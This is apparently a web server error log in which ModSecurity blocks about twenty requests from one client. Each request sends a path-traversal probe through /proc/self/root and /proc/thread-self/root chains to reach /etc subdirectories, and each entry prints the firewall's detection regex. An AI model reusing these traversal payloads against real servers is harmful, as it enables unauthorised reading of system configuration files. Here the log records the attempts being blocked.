https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:19.330786 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:47774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2N8df6f5d65gmYZRKWwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:20.630546 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:49280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2OAkwaGbbGflqUZCNwAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:22.211543 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:49294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2Ovu8EFLIOrSqIpt2GAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:23.539506 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:49296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2O-yqAr6etmhZHNo6UQAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:24.137806 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:39:24.866298 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:49298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2PF_V7PWP6ixUYl6SgAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:26.245353 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:49304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2PuoXxyEfFpUF8f_nUQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:28.163649 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:49312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2QP-YZRR_7pZ7nDJkWAAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:29.815016 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:38686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2QQkwaGbbGflqUZCNyAAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:31.907697 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:38688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2QwkwaGbbGflqUZCNzQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:33.367499 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:38692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2ReyqAr6etmhZHNo6XAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:34.799551 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:38708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2RuoXxyEfFpUF8f_nVQAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:37.023295 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:38712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2Sfu8EFLIOrSqIpt2HwAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:39.626097 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:38718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2SwkwaGbbGflqUZCN2AAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:40.943462 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:57408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2TMdf6f5d65gmYZRKZgAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:43.138543 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:57422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2T-oXxyEfFpUF8f_nWAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:43.850339 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:57422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2T-oXxyEfFpUF8f_nWQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:44.923173 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:57422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2UOoXxyEfFpUF8f_nWgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:46.667354 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:57436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2Ul_V7PWP6ixUYl6SiAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:48.795161 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:57448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2VPu8EFLIOrSqIpt2JwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:51.883077 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.243.128:52246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2V_-YZRR_7pZ7nDJkZAAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:55.458673 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:52262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2W_-YZRR_7pZ7nDJkaAAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
